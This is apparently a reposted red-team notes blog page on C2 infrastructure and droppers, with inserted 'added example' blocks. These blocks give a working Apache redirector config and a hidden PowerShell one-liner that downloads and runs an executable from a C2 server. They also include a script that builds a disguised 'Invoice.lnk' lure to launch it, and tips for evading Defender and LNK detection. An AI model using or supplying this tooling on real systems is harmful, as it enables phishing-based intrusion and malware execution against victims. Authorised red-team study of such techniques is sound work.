2025-10-12 10:46:56 Author: fluxsec.red (view original) · 131 views

Some tricks and notes around Red Team engagements


  • Before an engagement, do you have:
    • Full legal sign-off for what you are about to do?
    • A clearly defined legal scope of which networks / ranges / machines you are allowed to target and test?
    • Confirmation that the entire team knows the scope boundaries and has been briefed in full?
    • Never break the law. Always ask the client's permission (or have it explicitly in scope) before running an exploit. If the exploit could cause a device to go down, always seek explicit permission from the authorising entity first.
  • For Cobalt Strike ops, see the cheat sheet here that I forked from An0nUD4Y on GitHub. There is good material in there both for Cobalt Strike and for general post-exploitation. I may edit that, and / or pull some things into here where I find them useful in red team offensive development / infrastructure creation / hardening.

C2 infrastructure

I have some notes on redirectors in my forked cheat sheet, but mostly:

  • Use redirectors. The team server should never be directly reachable by the target; every request should pass through a redirector that forwards only implant traffic and sends everything else elsewhere.
  • Use an expired-domain search service to find recently expired domains, then check the candidates in web proxy categorisation tools / AlienVault OTX for any existing reputation before using them.
  • Invest some time in maturing the infrastructure (aged, categorised domains) if required.
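The redirector point above in concrete form, as an added example (mine, not from the original post): an Apache virtual host that reverse-proxies only requests matching the implant's User-Agent and known C2 URIs to the team server, and 302s everything else to a decoy. The team server address and the /thanks URI are the ones in the PowerShell one-liner further down this page; the redirector hostname, the decoy site, the User-Agent fragment and the second URI pattern are placeholders you would replace with your own profile's values. With this in place the dropper fetches from the redirector hostname, not from the team server directly.

```apache
# Added example (not from the original post): Apache redirector for C2 traffic.
# Requires: a2enmod rewrite proxy proxy_http
# Team server address and /thanks URI come from the one-liner on this page;
# hostnames, decoy site and the UA fragment are assumptions.
<VirtualHost *:80>
    ServerName updates.example-redirector.com

    RewriteEngine On

    # Condition 1: only the User-Agent the implant actually sends (assumed here
    # to contain "Windows NT 10.0"; set it to whatever your profile / dropper uses).
    RewriteCond %{HTTP_USER_AGENT} "Windows NT 10\.0" [NC]
    # Condition 2: only the known C2 URIs. The second pattern is a placeholder
    # for a staging path; anything else is a scanner, crawler or analyst.
    RewriteCond %{REQUEST_URI} "^/(thanks|stage/[A-Za-z0-9]{8})$"
    # Both conditions matched: proxy (P) to the team server, stop processing (L).
    RewriteRule ^/(.*)$ http://172.17.57.89:8080/$1 [P,L]

    # Fall-through: everyone else is bounced to a harmless site. Use a site you
    # control or a generic one, not a third party you have no relationship with.
    RewriteRule ^ https://www.example.com/ [R=302,L]

    # Rewrite Location headers in team server responses so the backend address
    # never leaks to the client.
    ProxyPassReverse / http://172.17.57.89:8080/

    # Keep error pages quiet about the server.
    ServerSignature Off
</VirtualHost>
```

To check it from outside: a curl with the matching User-Agent to /thanks should return whatever the team server serves, while a plain curl to /thanks or to any other path should come back as a 302 to the decoy. Test both before the engagement, because a redirector that proxies everything is just a second copy of the team server's fingerprint.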

Droppers

Do not name them chrome.exe, ms-updater.exe or similar; certainly if they are unsigned, Defender's ML will flag them with a machine-learning trojan detection, and rightly so. Choose something more unique or bespoke.

If it can be avoided, do NOT use an executable; go for a DLL, and preferably DLL sideloading.

Code signing certificates go a long way. I would not recommend using leaked ones: that could be seen as theft, though I do not know of any specific case law around it. It's not worth it, in my opinion.

PowerShell one-liner that can be put into a shortcut to download a payload from the C2 into %ProgramData% and run it:

powershell.exe -w h -c "iwr http://172.17.57.89:8080/thanks -o $env:ProgramData\test.exe; start $env:ProgramData\test.exe"

Here -w h is -WindowStyle Hidden, -c is -Command, iwr is the alias for Invoke-WebRequest (-o is -OutFile) and start is the alias for Start-Process. The IP, port, URI and file name are placeholders; per the naming advice above you would pick something less obvious than test.exe.
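Putting that one-liner into a shortcut, as an added example (mine, not from the original post): the script below writes a .lnk via the WScript.Shell COM object whose target is powershell.exe with the hidden-window arguments. The C2 URL and drop path are the page's placeholders; the shortcut name, location, icon and description are my assumptions.

```powershell
# Added example, not from the original post: write a .lnk that launches the
# hidden PowerShell one-liner above. URL and drop path are the page's
# placeholders; shortcut name, icon and description are assumptions.
$c2Url    = 'http://172.17.57.89:8080/thanks'
# Single quotes keep $env:ProgramData literal here so it expands on the target
# machine when the shortcut runs, not on the machine building the shortcut.
$dropPath = '$env:ProgramData\test.exe'
$payload  = "iwr $c2Url -o $dropPath; start $dropPath"

$lnkPath = Join-Path $env:USERPROFILE 'Desktop\Invoice.lnk'   # assumed location/name
$shell   = New-Object -ComObject WScript.Shell
$lnk     = $shell.CreateShortcut($lnkPath)
$lnk.TargetPath       = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
$lnk.Arguments        = "-w h -c `"$payload`""   # -w h = -WindowStyle Hidden, -c = -Command
$lnk.WorkingDirectory = $env:ProgramData
$lnk.WindowStyle      = 7                        # 7 = start minimised, in case the console flashes before -w h applies
$lnk.IconLocation     = "$env:SystemRoot\System32\shell32.dll,1"   # generic document icon (index assumed)
$lnk.Description      = 'Invoice'
$lnk.Save()

# Read the shortcut back and show exactly what the target will execute.
$check = $shell.CreateShortcut($lnkPath)
'{0} {1}' -f $check.TargetPath, $check.Arguments
```

Keep the argument string short: a shortcut whose target is powershell.exe with a hidden window and a long command line is one of the most common LNK hunting signatures, so the less you put in the .lnk itself (and the more you fetch from the redirector), the better.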


Source: https://fluxsec.red/red-team-notes